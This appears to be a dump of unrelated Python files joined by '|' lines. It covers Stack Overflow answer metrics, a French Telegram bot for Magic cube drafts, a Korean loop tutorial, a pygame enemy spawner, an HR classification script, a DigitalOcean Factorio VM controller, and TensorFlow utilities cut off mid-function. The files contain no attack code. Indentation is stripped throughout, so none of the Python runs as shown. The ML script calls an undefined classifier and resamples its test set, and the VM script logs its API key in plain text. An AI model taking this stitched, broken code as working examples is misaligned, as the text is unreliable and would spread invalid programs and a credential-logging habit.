tags_info = {}
for _, a in qa:
for t in a["tags"]:
tc = tags_info.get(t, (0, 0, 0)) # (score, acceptance, count)
tc = (tc[0] + a["score"], tc[1] + a["is_accepted"], tc[2] + 1)
tags_info[t] = tc
_tags_info = tags_info
return tags_info
def top_tags_use(qa, top=5):
"""Top tags by appearance"""
tags = tags_info(qa)
sorted_tags = sorted(tags, key=lambda x: tags[x][2], reverse=True)
return [(x, tags[x][2]) for x in sorted_tags][:top]
def top_tags_score_abs(qa, top=5):
"""Top tags by accumulated score"""
tags = tags_info(qa)
sorted_tags = sorted(tags, key=lambda x: tags[x][0], reverse=True)
return [(x, tags[x][0]) for x in sorted_tags][:top]
def top_tags_acceptance_abs(qa, top=5):
"""Top tags by accumulated acceptance"""
tags = tags_info(qa)
sorted_tags = sorted(
tags,
key=lambda x: tags[x][1],
reverse=True,
)
return [(x, tags[x][1]) for x in sorted_tags][:top]
def top_tags_score_rel(qa, top=5):
"""Top tags by score per answer"""
tags = tags_info(qa)
sorted_tags = sorted(tags, key=lambda x: tags[x][0] / tags[x][2], reverse=True)
return [(x, tags[x][0] / tags[x][2]) for x in sorted_tags][:top]
def top_tags_acceptance_rel(qa, top=5):
"""Top tags by acceptance per answer"""
tags = tags_info(qa)
sorted_tags = sorted(tags, key=lambda x: tags[x][1] / tags[x][2], reverse=True)
return [(x, tags[x][1] / tags[x][2]) for x in sorted_tags][:top]
#
# ANSWER RELATED METRICS
#
def top_answers(answers, top=5):
"""Top answers by score"""
return sorted(answers, key=lambda x: x["score"], reverse=True)[:top]
def top_accepted(answers, top=5):
"""Top accepted answers by score"""
return list(
filter(
lambda x: x["is_accepted"],
sorted(answers, key=lambda x: x["score"], reverse=True),
)
)[:top]
#
# REPUTATION RELATED METRICS
#
def reputation(answer):
"""Reputation associated to an answers
NOT ACCURATE
"""
return answer["score"] * 10 + answer["is_accepted"] * 15
_answers_sorted_reputation = None
_total_reputation = None
def answers_sorted_reputation(answers):
"""Answers sorted by associated reputation"""
global _answers_sorted_reputation
if _answers_sorted_reputation is None:
_answers_sorted_reputation = sorted(
answers, key=lambda x: reputation(x), reverse=True
)
return _answers_sorted_reputation
def total_reputation(answers):
"""Total reputation gained from answers"""
global _total_reputation
if _total_reputation is None:
_total_reputation = sum([reputation(a) for a in answers])
return _total_reputation
def average_reputation_weight(answers, w):
"""Average reputation and weight of answers generating w % reputation"""
repw = total_reputation(answers) * w
sorted_answers = answers_sorted_reputation(answers)
acc_rep = 0
acc_ans = 0
while acc_rep < repw and acc_ans < len(sorted_answers):
acc_rep += reputation(sorted_answers[acc_ans])
acc_ans += 1
if acc_ans == 0:
return (0, 0)
return (acc_rep / acc_ans, 100 * acc_ans / len(answers))
#
# LISTS TO SIMPLIFY CALLING
#
tag_metrics = [ # call with qa
("Top used tags", top_tags_use),
("Top tags by accumulated score", top_tags_score_abs),
("Top tags by score per answer", top_tags_score_rel),
("Top tags by accumulated acceptance", top_tags_acceptance_abs),
("Top tags by acceptance per answer", top_tags_acceptance_rel),
]
answer_metrics_single = [ # call with answers
("Answers analyzed", len),
("Total score", lambda x: sum([a["score"] for a in x])),
("Average score", lambda x: sum([a["score"] for a in x]) / len(x)),
("Total accepted", lambda x: sum([a["is_accepted"] for a in x])),
("Acceptance ratio", lambda x: sum([a["is_accepted"] for a in x]) / len(x)),
]
answer_metrics_tops = [ # call with answers
("Top answers by score", top_answers, lambda a: a["score"]),
("Top accepted answers by score", top_accepted, lambda a: a["score"]),
]
reputation_metrics_single = [ # call with answers
("Total reputation", lambda x: sum([reputation(a) for a in x])),
("Average reputation", lambda x: sum([reputation(a) for a in x]) / len(x)),
]
reputation_weight_metrics = ( # call with answers and weights
[0.95, 0.80],
average_reputation_weight,
(
"Average reputation on answers generating {:.0f}% reputation",
"Percentage of answers generating {:.0f}% reputation",
),
)
|
from array import *
def dupli(n):
n_set=set()
n_dupli=-1
for i in range(len(n)):
if n[i] in n_set:
return n[i]
else:
n_set.add(n[i])
return n_dupli
n=array('i',[1,3,5,4,32,65,53,243,3])
print(dupli(n))
|
import re
import io
import deckstat_interface as deckstat
import logging
from utils import set_boosters
from time import sleep
from random import shuffle
from filters import restrict, SealedConv, UserType
from functools import partial
from model import session, Cube, CubeList, Game, Player, Card, Deck, DeckList, Draft, Drafter
from telegram import InlineKeyboardButton, InlineKeyboardMarkup, MessageEntity, ReplyKeyboardRemove
from telegram.ext import Filters, CommandHandler, ConversationHandler, MessageHandler, CallbackQueryHandler
class DraftHandler:
def __init__(self, dispatcher):
self.dispatcher = dispatcher
self.players = []
self.subscribers = []
self.cube = None
# Draft
self.draft = None
self.drafted_card_handler = None
self.draft_pool_handler = None
self.draft_handler = self.get_select_player_convHandler("draft", self.start_draft)
dispatcher.add_handler(self.draft_handler)
# Sealed
self.sealed_handler = self.get_select_player_convHandler("sealed", self.start_sealed)
dispatcher.add_handler(self.sealed_handler)
def get_select_player_convHandler(self, command, behaviour):
conv_handler = ConversationHandler(
entry_points=[CommandHandler(command, self.start_select_cube)],
states={
SealedConv.CUBE: [CallbackQueryHandler(self.choose_cube, pattern=r"cube_id=(\d*)$")],
SealedConv.CHOOSING: [CallbackQueryHandler(partial(self.choose_player, behaviour),
pattern=r"player_id=(\d*)$")]
},
fallbacks=[])
return conv_handler
def get_select_player_keyboard(self):
# subscribers = sealed_players
keyboard = []
if len(self.subscribers) < 5:
for player in self.players:
if player not in self.subscribers:
keyboard.append([InlineKeyboardButton(player.name, callback_data=f"player_id={player.id}")])
if len(self.subscribers):
keyboard.append([InlineKeyboardButton("Corriger", callback_data="player_id=2"),
InlineKeyboardButton("Envoyer", callback_data="player_id=1")])
keyboard.append([InlineKeyboardButton("Annuler", callback_data="player_id=0")])
return keyboard
@restrict(UserType.ADMIN)
def start_select_cube(self, update, context):
keyboard = []
cubes = session.query(Cube).all()
for cube in cubes:
keyboard.append([InlineKeyboardButton(cube.name, callback_data=f"cube_id={cube.id}")])
keyboard.append([InlineKeyboardButton("Annuler", callback_data="cube_id=0")])
reply_markup = InlineKeyboardMarkup(keyboard)
text = "Selectionne un cube :"
update.message.reply_text(text=text,
reply_markup=reply_markup)
return SealedConv.CUBE
def choose_cube(self, update, context):
query = update.callback_query
reg = re.compile(r"cube_id=(\d*)")
match = int(reg.findall(query.data)[0])
if match == 0:
text = "Limité annulé, pour recommencer: /sealed ou /draft"
query.edit_message_text(text=text)
return ConversationHandler.END
else:
self.cube = session.query(Cube).filter(Cube.id == match).one()
# TODO: load here cube specific draft behaviour
self.players = session.query(Player).all()
reply_markup = InlineKeyboardMarkup(self.get_select_player_keyboard())
text = f"Cube sélectionné: {self.cube.name}\nSélectionne maintenant les joueurs qui participeront :"
query.edit_message_text(text=text,
reply_markup=reply_markup)
return SealedConv.CHOOSING
def choose_player(self, behaviour, *args):
update, context = args
query = update.callback_query
reg = re.compile(r"player_id=(\d*)")
match = reg.findall(query.data)[0]
if match == "0":
text = "Limité annulé, pour recommencer: /sealed ou /draft"
query.edit_message_text(text=text)
self.subscribers = []
return ConversationHandler.END
elif match == "1":
# players are selected, start something
text = "Joueurs selectionnés:\n"
for player in self.subscribers:
text += f"- <a href='tg://user?id={player.id}'>{player.name}</a>\n"
query.edit_message_text(text=text, parse_mode="HTML")
behaviour(update, context)
self.subscribers = []
return ConversationHandler.END
elif match == "2":
# Remove last
del self.subscribers[-1]
text = "Joueurs selectionnés:\n"
for player in self.subscribers:
text += f"- <a href='tg://user?id={player.id}'>{player.name}</a>\n"
else:
# Add player
player = session.query(Player).filter(Player.id == int(match)).first()
self.subscribers.append(player)
text = "Joueurs selectionnés:\n"
for player in self.subscribers:
text += f"- <a href='tg://user?id={player.id}'>{player.name}</a>\n"
reply_markup = InlineKeyboardMarkup(self.get_select_player_keyboard())
query.edit_message_text(text=text,
parse_mode="HTML",
reply_markup=reply_markup)
return SealedConv.CHOOSING
def start_sealed(self, update, context):
# Send sealed
cards = session.query(Card).join(CubeList).join(Cube).filter(Cube.id == self.cube.id, Card.type_line != "Basic Land").all()
shuffle(cards)
shuffle(self.subscribers)
sealed_size = 90
start = 0
final_text = "Les scellés ont bien été envoyés à :\n"
for player in self.subscribers:
pool = cards[start:start+sealed_size]
start += sealed_size
url = deckstat.get_sealed_url(pool, title=f"Scellé de {player.name}")
logging.info(f"{player.name} Sealed Pool [{url}]")
text = f"{player.name} voici <a href='{url}'>ton scellé</a>.\nPense à créer ton deck avec et à le sauvegarder avant la prochaine partie.\n"
text += "<i>Pour modifier ton deck utilise l'éditeur deckstat puis enregistre le sur ton compte "\
"ou si tu n'as pas de compte fait les modifs sur deckstat puis cliques sur export et copie colle ta decklist terminée dans le chat.</i>"
context.bot.send_message(chat_id=player.id,
text=text,
parse_mode="HTML")
final_text += f"- {player.name}\n"
sleep(1)
update.callback_query.edit_message_text(text=final_text)
def get_booster_dialogue(self, drafter, is_new_booster=True, row_length=3):
text = f"Un booster tout frais est disponible !\n\n"
booster = drafter.get_booster()
if booster and booster.from_drafter:
text = f"<a href='tg://user?id={booster.from_drafter.id}'>{booster.from_drafter.name}</a> vient de te passer son booster !\n\n"
text += f"<u>Ronde {self.draft.round_count}/{self.draft.round_num}</u>"
if drafter.pool:
text += f"\nMon dernier pick: <a href='https://scryfall.com/card/{drafter.pool[-1].scryfall_id}'>{drafter.pool[-1].name}</a>"
if len(drafter.pool) > 1:
text += f"\nVoir mon pool: /pool"
if is_new_booster or not drafter.choice:
text += "\nSelectionne une carte :\n"
else:
text += "\nChoix pris en compte. En attente des autres joueurs...\n"
if not booster:
session.commit()
url = deckstat.get_sealed_url(drafter.pool, title=f"Draft de {drafter.name}")
text = f"Draft terminé. Voici ton <a href='{url}'>pool</a>"
# TODO : function to clean draft data and handlers
if self.drafted_card_handler:
self.dispatcher.remove_handler(self.draft_pool_handler)
self.dispatcher.remove_handler(self.drafted_card_handler)
self.drafted_card_handler = None
# Add entry point
self.dispatcher.add_handler(self.draft_handler)
return text, None
cards = booster.cards
if not cards:
text += "Pas de cartes à drafter pour le moment."
return text, None
choice_emoji = "\U0001F448"
keyboard = []
for i in range(0, len(cards), row_length):
row = []
max = i + row_length
if max > len(cards): max = len(cards)
for n in range(i, max, 1):
if drafter.choice and cards[n] == drafter.choice.card:
text += f"{n+1}) <b><a href='{cards[n].image_url}'>{cards[n].name}</a></b>{choice_emoji}\n"
else:
callback_data = f"[{self.get_callback_pattern(id_only=True)}]card_id={cards[n].id}"
row.append(InlineKeyboardButton(f"{n+1}", callback_data=callback_data))
text += f"{n+1}) <a href='{cards[n].image_url}'>{cards[n].name}</a>\n"
keyboard.append(row)
return text, InlineKeyboardMarkup(keyboard)
def get_callback_pattern(self, id_only=False):
# pattern example: [3124]card_id=208
# If pattern is False return only the id
i = f"{self.draft.id}{self.draft.round_count}{self.draft.drafters[0].pick_count}"
if id_only: return i
p = r"^\[" + i + r"\]card_id=(\d*)$"
logging.info(f"Callback pattern: {p}")
return p
def start_draft(self, update, context):
# Remove entry point
self.dispatcher.remove_handler(self.draft_handler)
self.draft = Draft(cube=self.cube)
[self.draft.add_drafter(Drafter(s.id, s.name)) for s in self.subscribers]
remaining_cards, filename = set_boosters(self.draft)
self.send_doc(chat_id=update.callback_query.from_user.id,
context=context,
content=remaining_cards,
filename=filename)
self.draft.start()
self.drafted_card_handler = CallbackQueryHandler(self.choose_card, pattern=self.get_callback_pattern())
self.dispatcher.add_handler(self.drafted_card_handler)
self.draft_pool_handler = CommandHandler("pool", self.get_drafter_pool)
self.dispatcher.add_handler(self.draft_pool_handler)
for drafter in self.draft.drafters:
drafter.data = {"query": None}
text, reply_markup = self.get_booster_dialogue(drafter)
context.bot.send_message(chat_id=drafter.id,
text=text,
reply_markup=reply_markup,
parse_mode="HTML",
disable_web_page_preview=True,
disable_notification=False)
def choose_card(self, update, context):
query = update.callback_query
drafter = self.draft.get_drafter_by_id(query.from_user.id)
reg = re.compile(r"card_id=(\d*)")
match = int(reg.findall(query.data)[0])
card = session.query(Card).filter(Card.id == match).first()
pick_count = drafter.pick_count
round_count = self.draft.round_count
is_new_booster, is_new_round = drafter.choose(card)
drafter.data["query"] = query
# If new booster or new round, we edit previous query message then send new reply markup for all drafters
if is_new_booster or is_new_round:
# Update callback pattern to avoid an old callback to to send wrong data
self.drafted_card_handler.pattern = self.get_callback_pattern()
for drafter in self.draft.drafters:
# If auto pick is activated, send the auto pick to drafter
if is_new_round and self.draft.auto_pick_last_card:
self.send_card(drafter.pool[-2],
msg_data=drafter.data["query"],
title=f"Ronde {round_count} Pick {pick_count}")
self.send_card(drafter.pool[-1],
msg_data=drafter.id,
title=f"Ronde {round_count} Pick {pick_count+1}",
context=context)
else:
self.send_card(drafter.pool[-1],
msg_data=drafter.data["query"],
title=f"Ronde {round_count} Pick {pick_count}")
text, reply_markup = self.get_booster_dialogue(drafter, is_new_booster=is_new_booster)
sleep(0.5)
context.bot.send_message(chat_id=drafter.id,
text=text,
reply_markup=reply_markup,
parse_mode="HTML",
disable_web_page_preview=True,
disable_notification=False)
# If a choice is made but not all users made one, we show choosed card
else:
text, reply_markup = self.get_booster_dialogue(drafter, is_new_booster)
query.edit_message_text(text=text,
reply_markup=reply_markup,
parse_mode="HTML",
disable_web_page_preview=True)
def get_drafter_pool(self, update, context):
text = "Il te faut au moins avoir drafté 2 cartes pour voir ton pool."
drafter = self.draft.get_drafter_by_id(update.message.from_user.id)
if len(drafter.pool) > 1:
url = deckstat.get_sealed_url(drafter.pool, title=f"Draft de {drafter.name}")
text = f"Voici <a href='{url}'>ton pool</a>."
update.message.reply_text(text=text,
parse_mode="HTML")
@staticmethod
def send_card(card, msg_data, title, context=None):
text = f"<a href='{card.image_url}'>{title}</a>"#https://scryfall.com/card/
if context:
context.bot.send_message(chat_id=msg_data,
text=text,
parse_mode="HTML",
disable_web_page_preview=False)
else:
msg_data.edit_message_text(text=text,
parse_mode="HTML",
disable_web_page_preview=False)
sleep(0.5)
@staticmethod
def send_doc(chat_id, context, content, filename):
s = io.StringIO(content)
s.seek(0)
document = io.BytesIO()
document.write(s.getvalue().encode())
document.seek(0)
document.name = filename
context.bot.send_document(chat_id=chat_id, document=document)
|
# while <불 표현식>
# 명령어
# i =0
# while i < 10 :
# print(i)
# i += 1
# numbers =[1,3,1,5,18,1,0]
# while 1 in numbers:
# numbers.remove(1)
# print(numbers)
# 특정 시간 동안 대기하는 프로그램 작성
# import time
# fi = time.time()
# while fi + 3 >= time.time():
# pass
# print("3초가 지났습니다.")
# import time
# fi = time.time()
# while fi + 1 >= time.time():
# print("xyz", end="")
# print("1초가 지났습니다.")
# i=0
# while True:
# print("{}번째 실행하고 있습니다.".format(i))
# i += 1
# input_text = input("> 종료하시겠습니까? y, n")
# if input_text.lower()=="y":
# print("반복을 종료합니다")
# break
# continue 현재 반복을 중지하고, 다음 반복으로 넘어간다.
treeHit =0
while treeHit < 10:
treeHit += 1
print("나무를 %d번 찍었습니다." %treeHit)
if treeHit == 10:
print("나무가 넘어갔습니다.ㅎㅎㅎ")
|
import pygame, enemy, random, graph
FULLSTORYTIME=10000
def happen(storytime, surface, scr):
t = storytime
if t == 0:
FULLSTORYTIME=12000
graph.dMP = 0.2
elif t <= 1000:
if t//200 == t/200: enemy.OrdinEne(random.choice(['L', 'R', 'U', 'D']))
elif t <= 2000:
if t == 1100: enemy.SpikeEne(random.choice(['LU', 'LD', 'RU', 'RD']))
if t == 1300: enemy.HealEne(random.choice(['L', 'R', 'U', 'D']))
if t == 1500: enemy.WeirdEne(random.choice(['U', 'D']))
if t == 1700: enemy.SplitEne(random.choice(['L', 'R', 'U', 'D']))
if t == 1900: enemy.PhantEne(4, random.randint(0, 360))
elif t <= 4000:
if t//200 == t/200: enemy.OrdinEne(random.choice(['L', 'R', 'U', 'D']))
if t//300 == t/300:
decision = random.randint(0,3)
if decision == 0: enemy.SpikeEne(random.choice(['LU', 'LD', 'RU', 'RD']))
elif decision == 1: enemy.HealEne(random.choice(['L', 'R', 'U', 'D']))
elif decision == 2: enemy.WeirdEne(random.choice(['U', 'D']))
elif t <= 5000:
if t//150 == t/150: enemy.SplitEne(random.choice(['L', 'R', 'U', 'D']))
elif t <= 5500:
pass
elif t <= 7500:
if t//200 == t/200: enemy.OrdinEne(random.choice(['L', 'R', 'U', 'D']))
if t//250 == t/250:
decision = random.randint(0,5)
if decision == 0: enemy.SpikeEne(random.choice(['LU', 'LD', 'RU', 'RD']))
elif decision == 1: enemy.HealEne(random.choice(['L', 'R', 'U', 'D']))
elif decision == 2: enemy.WeirdEne(random.choice(['U', 'D']))
elif decision == 3: enemy.SplitEne(random.choice(['L', 'R', 'U', 'D']))
elif decision == 4: enemy.PhantEne(4, random.randint(0, 360))
elif t <= 8750:
if t == 8000:
enemy.PhantEne(5, 30)
enemy.PhantEne(5, 150)
enemy.PhantEne(5, 270)
elif t <= 9500:
if t == 9000:
enemy.SpikeEne('LU')
enemy.SpikeEne('LD')
enemy.SpikeEne('RU')
enemy.SpikeEne('RD')
if t//200 == t/200:
enemy.WeirdEne('U')
enemy.WeirdEne('D')
enemy.PhantEne(3, random.randint(0, 360))
else:
if len(enemy.enemies)==0:
FULLSTORYTIME = t
|
import pandas as pd
import numpy as np
import time
import matplotlib.pyplot as plt
dataset= pd.read_csv('HR.csv')
X=dataset.iloc[:,1:13]
y=dataset.iloc[:,-1]
m= np.shape(X)[0]
n= np.shape(X)[1]
#Age bin
from sklearn.preprocessing import KBinsDiscretizer
est = KBinsDiscretizer(n_bins=6, encode='ordinal', strategy='uniform')
est.fit(X.iloc[:,6:7])
pp=est.transform(X.iloc[:,6:7])
xx=pd.get_dummies(pp.flatten())
#Legnth of service bin
est = KBinsDiscretizer(n_bins=4, encode='ordinal', strategy='uniform')
est.fit(X.iloc[:,8:9])
pp=est.transform(X.iloc[:,8:9])
xx1=pd.get_dummies(pp.flatten())
#Avg training score bin
est = KBinsDiscretizer(n_bins=5, encode='ordinal', strategy='uniform')
est.fit(X.iloc[:,11:12])
pp=est.transform(X.iloc[:,11:12])
xx2=pd.get_dummies(pp.flatten())
X=X.drop(columns=["age"])
X=pd.concat([X, xx], axis=1)
categorical=[]
for i in range(0,n):
if X.iloc[:,i].dtype.name == 'object':
categorical.append(i)
from sklearn.preprocessing import Imputer
for i in range(0,n):
if i not in categorical:
imputer = Imputer(missing_values = np.nan, strategy = 'mean', axis = 0)
imputer = imputer.fit(X.iloc[:, i:i+1])
X.iloc[:, i:i+1] = imputer.transform(X.iloc[:, i:i+1])
arr2=np.ones((m,1))
for i in categorical:
arr1= pd.get_dummies(X.iloc[:,i]).iloc[:,1:].to_numpy()
arr2=np.append(arr2, arr1, axis=1)
arr2=np.delete(arr2, 0, axis=1)
X=X.to_numpy()
X=np.delete(X, categorical, axis=1)
X=np.append(X,arr2, axis=1)
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state=0)
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
from sklearn.decomposition import PCA
pca = PCA(n_components = 2)
X_train = pca.fit_transform(X_train)
X_test = pca.transform(X_test)
ev = pca.explained_variance_ratio_
from collections import Counter
from imblearn.over_sampling import SMOTE
sm = SMOTE(random_state=42)
X_train, y_train = sm.fit_resample(X_train, y_train)
X_test, y_test = sm.fit_resample(X_test, y_test)
from xgboost import XGBClassifier
clas=XGBClassifier()
clas.fit(X_train, y_train)
predx=clas.predict(X_test)
from sklearn.metrics import accuracy_score
accuracy_score(y_test, predx)
from sklearn.metrics import precision_recall_fscore_support
precision_recall_fscore_support(y_test, predx)
#Submission
Test= pd.read_csv('test_2umaH9m.csv')
X1=Test.iloc[:,1:14]
m= np.shape(X1)[0]
n= np.shape(X1)[1]
from sklearn.preprocessing import KBinsDiscretizer
est = KBinsDiscretizer(n_bins=6, encode='ordinal', strategy='uniform')
est.fit(X1.iloc[:,6:7])
pp=est.transform(X1.iloc[:,6:7])
xx=pd.get_dummies(pp.flatten())
categorical=[]
for i in range(0,n):
if X1.iloc[:,i].dtype.name == 'object':
categorical.append(i)
from sklearn.preprocessing import Imputer
for i in range(0,n):
if i not in categorical:
imputer = Imputer(missing_values = np.nan, strategy = 'mean', axis = 0)
imputer = imputer.fit(X1.iloc[:, i:i+1])
X1.iloc[:, i:i+1] = imputer.transform(X1.iloc[:, i:i+1])
arr2=np.ones((m,1))
for i in categorical:
arr1= pd.get_dummies(X1.iloc[:,i]).iloc[:,1:].to_numpy()
arr2=np.append(arr2, arr1, axis=1)
arr2=np.delete(arr2, 0, axis=1)
X1=X1.to_numpy()
X1=np.delete(X1, categorical, axis=1)
X1=np.append(arr2,X1, axis=1)
X1=np.append(xx,X1,axis=1)
acpred= classifier.predict(X1)
acpred = (acpred > 0.5)
eid= np.reshape(Test.iloc[:,0].to_numpy(), (-1,1))
Submit=np.append(eid, acpred, axis=1)
np.savetxt("foo.csv", Submit, delimiter=",")
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import time
from time import strftime
from datetime import datetime
import digitalocean
import sys
try:
import keyring
keychain = True
except ImportError:
keychain = False
import logging
import argparse
__version__ = '0.1'
####################################################################################################
##### Config here
####################################################################################################
apikey = None # Digitalocean api key https://www.digitalocean.com/community/tutorials/how-to-use-the-digitalocean-api-v2
#apikey = "myapikeyhere"
vm_name = 'Factorio' # VM name that runs factorio server
vm_region = 'fra1' # fra1 = Frankfurt 1, alternativ nyc1, nyc2, nyc3 = New York, lon1 = London (Has to be the same region where the snapshot is saved!!)
vm_size = '1gb' # Size of VM has to match snapshot or be bigger
snapshot_name = "%d_%b_%Y_%H_%M_%S-" + vm_name # 13_May_2016_13_08_21-Factorio
max_factorio_snapshots = 2 # Maximal number of snapshots to keep of vm_name VM
####################################################################################################
####################################################################################################
logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)-2s %(filename)s:%(lineno)s] %(message)s")
logging.getLogger('requests').setLevel(logging.WARNING)
logging.getLogger('digitalocean').setLevel(logging.WARNING)
if keychain:
apikey = keyring.get_password('DO_API', 'DO_API')
def getManager():
global my_droplets, snapshot, manager, droplet
logging.info("Getting manager...")
manager = digitalocean.Manager(token=apikey)
my_droplets = manager.get_all_droplets()
# Get ssh key
# Note: ssh key names are NOT unique, just take the first one
key = None
for k in manager.get_all_sshkeys():
if k.name == 'DO_' + vm_name:
if key is None:
key = k
else:
logging.error("There are multiple ssh keys with name: " + 'DO_' + vm_name + " on DO, using first found!")
break
if key is None:
logging.error("Got no SSH key!")
sys.exit(0)
#TODO: For new Droplet create and upload new key if key doesnt exist on DO
image = getLatestFactorioImage()
if image is None:
logging.error("Could not find latest image of " + vm_name)
sys.exit(0)
droplet = digitalocean.Droplet(token=apikey,
name=vm_name,
region=vm_region,
image=image.id, # Latest matching snapshot
size_slug=vm_size, # Size of the VM
backups=False,
ssh_keys=[key])
def getLatestFactorioImage():
factorio_images = []
for image in manager.get_my_images():
try:
time = datetime.strptime(image.name, snapshot_name)
factorio_images.append(image)
except ValueError:
pass
if len(factorio_images) > 0:
logging.info("Latest " + vm_name + " image: " + factorio_images[-1].name)
return factorio_images[-1]
else:
return None
def getFactorioSnapshots():
all_snapshots = manager.get_my_images()
factorio_snapshots = []
for snapshot in all_snapshots:
try:
time = datetime.strptime(snapshot.name, snapshot_name)
factorio_snapshots.append(snapshot)
except ValueError:
pass
return factorio_snapshots
def cleanUpSnapshots():
all_snapshots = manager.get_my_images()
factorio_snapshots = getFactorioSnapshots()
logging.info("Out of " + str(len(all_snapshots)) + " found " + str(len(factorio_snapshots)) + " factorio snapshots")
if len(factorio_snapshots) > max_factorio_snapshots:
factorio_snapshots[0].destroy() # Deletes oldest snapshot
logging.info("DONE")
def getFactorioVM():
# Find factorio VM
vm = None
for drop in my_droplets:
if drop.name == vm_name:
vm = drop
break
return vm
# Parse arguments
parser = argparse.ArgumentParser(description='Control script for starting VM on digitalocean')
parser.add_argument(dest='command', type=str, help='status, start, stop, setAPIKEY')
parser.add_argument(dest='apikey', type=str, nargs='?', help='Digitalocean API key')
parser.add_argument('-v', '--verbose', action='store_true', dest='verbose',
help="Print debug messages")
parser.add_argument('-ns', '--no-snapshot', action='store_true', dest='no_snapshot',
help="Save no snapshot when stopping droplet")
parser.add_argument('-nd', '--no-destroy', action='store_true', dest='no_destroy',
help="Don't destroy droplet after stopping")
parser.add_argument('-nc', '--no-cleanup', action='store_true', dest='no_cleanup',
help="No snapshot cleanup")
args = parser.parse_args()
if args.verbose:
logging.getLogger().setLevel(logging.DEBUG)
logging.debug("Verbose logging enabled")
if args.apikey is not None:
apikey = args.apikey
if apikey is None:
logging.error("No apikey given!!")
sys.exit(0)
if args.command == "setAPIKEY":
if keychain:
keyring.set_password("DO_API", "DO_API", apikey)
logging.info("Saved API key to keychain: " + apikey)
else:
logging.error("Missing keyring python libary!")
if args.command == "start":
getManager()
logging.info(str(droplet))
droplet.create()
actions = droplet.get_actions()
for action in actions:
action.load()
# Once it shows complete, droplet is up and running
while "progress" in action.status:
time.sleep(5)
action.load()
logging.info(str(action.status))
droplet.load()
logging.info("Droplet ip adress:" + str(droplet.ip_address))
if args.command == "status":
getManager()
logging.debug("Running droplets: " + str(my_droplets))
logging.info("Factorio droplet: " + str(getFactorioVM()))
#for drop in my_droplets:
# logging.info(str(drop.load()))
all_snapshots = manager.get_my_images()
logging.debug("Snapshots:" + str(all_snapshots))
logging.info("Snapshots of " + vm_name + ": " + str(getFactorioSnapshots()))
if args.command == "stop":
getManager()
# Find factorio VM
factorio = getFactorioVM()
if factorio is None:
logging.error("Could not find VM: " + vm_name)
sys.exit(0)
if factorio.status != "off":
logging.info("SHUTDOWN")
factorio.shutdown()
actions = factorio.get_actions()
for action in actions:
action.load()
# Once it shows complete, droplet is up and running
while "progress" in action.status:
time.sleep(5)
action.load()
logging.info(str(action.status))
if not args.no_snapshot:
logging.info("TAKE SNAPSHOT")
factorio.take_snapshot(strftime(snapshot_name), power_off=True)
actions = factorio.get_actions()
for action in actions:
action.load()
# Once it shows complete, droplet is up and running
while "progress" in action.status:
time.sleep(5)
action.load()
logging.info(action.status)
if not args.no_destroy:
logging.info("DESTROY")
factorio.destroy()
actions = factorio.get_actions()
for action in actions:
action.load()
# Once it shows complete, droplet is up and running
while "progress" in action.status:
time.sleep(5)
action.load()
logging.info(str(action.status))
if not args.no_cleanup:
logging.info("CLEANING FACTORIO SNAPSHOTS")
cleanUpSnapshots() |
#%%
import tensorflow as tf
import itertools
import numpy as np
from random import randint
from math import ceil
def utiltest():
print('Utilitie function test.')
#region Multivariate gaussian distribution
# class for substituting package tensorflow_probability.MultivariateNormalDiag
class MultivariateNormalDiag:
def __init__(self, mu,sigma):
self.mu=tf.cast(mu,dtype=tf.float64)
self.Sigma=tf.linalg.diag(tf.transpose(tf.math.abs(sigma)),k=1)
self.Sigma_2=tf.linalg.diag(tf.math.square(tf.transpose(sigma)),k=1)
@tf.function
def sample(self):
eps = tf.random.normal(shape=tf.shape(tf.transpose(self.mu)),dtype=tf.float64)
return tf.transpose((tf.cast(self.Sigma,dtype=tf.float64)@eps[...,None])[...,0])+self.mu
# corresponds to kl_divergence(mvnd,self)
@tf.function
def kl_divergence(self,mvnd):
retVal=-tf.cast(tf.shape(self.mu)[0],dtype=tf.float32)*tf.ones(tf.shape(self.mu)[1])
# retVal=tf.cast(retVal,dtype=tf.float64)
mu1=mvnd.mu
Sigma1_2=mvnd.Sigma_2
d=tf.linalg.det(self.Sigma)
d1=tf.linalg.det(mvnd.Sigma)
retVal+=tf.cast(tf.math.log(d/d1),dtype=tf.float32)
Sigma_2_inv=tf.linalg.inv(self.Sigma_2)
retVal+=tf.cast(tf.linalg.trace(tf.linalg.matmul(Sigma1_2,Sigma_2_inv)),dtype=tf.float32)
mu=tf.cast(self.mu-mu1,dtype=tf.float32)
retVal+=tf.cast(tf.linalg.diag_part((Sigma_2_inv@mu)[...,0]@mu),dtype=tf.float32)
return retVal
#endregion
#region combinatorics
def getOuterProduct(li1,li2=None,condition=lambda x,y : True):
b=[]
if li2 is None:
li2=li1
if isinstance(li1,list) and isinstance(li2,list):
for i in li1:
for j in li2:
if condition(i,j):
b.append([i,j])
return b
elif isinstance(li1,int) and isinstance(li2,int):
for i in range(li1):
for j in range(li2):
if condition(i,j):
b.append([i,j])
return b
def getOuterProduct2Array(ar,condition=lambda x : True):
arr=[]
for i in range(len(ar)):
arr.append(tuple(range(ar[i])))
return list(filter(condition,itertools.product(*arr)))
#region n-ary products
def __checkNAry(list,ar):
for i in range(0,len(ar)):
for j in range(i+1,len(ar)):
if not len(set(['_'+str(l[i])+'_'+str(l[j])+'_' for l in list])) \
==ar[i]*ar[j]:
return False
return True
def __getNAryOuterProduct2Array(ar,n=2):
liC=np.array(getOuterProduct2Array(ar[0:n]))
liC=List([List(l) for l in liC])
dicFunc={}
dicFunc[0]= lambda l: l[0:n].lappend((l[0]+l[1])%ar[n])
if n==3:
dicFunc[1]=( lambda l: l[0:n+1].lappend((l[0]+l[2])%ar[n+1]))
dicFunc[2]=( lambda l: l[0:n+2].lappend((l[0]+l[2]+l[3])%ar[n+2]))
dicFunc[3]=( lambda l: l[0:n+3].lappend((3*l[0]+2*l[1]+l[3]+randint(0,ar[n+3]))%ar[n+3]))
dicFunc[4]=( lambda l: l[0:n+4].lappend((3*l[1]+2*l[2]+l[3]+randint(0,ar[n+4]))%ar[n+3]))
else:
dicFunc[1]=( lambda l: l[0:n+1].lappend((3*l[0]+2*l[1]+randint(0,ar[n+1]))%ar[n+1]))
dicFunc[2]=( lambda l: l[0:n+2].lappend((3*l[1]+2*l[2]+randint(0,ar[n+2]))%ar[n+2]))
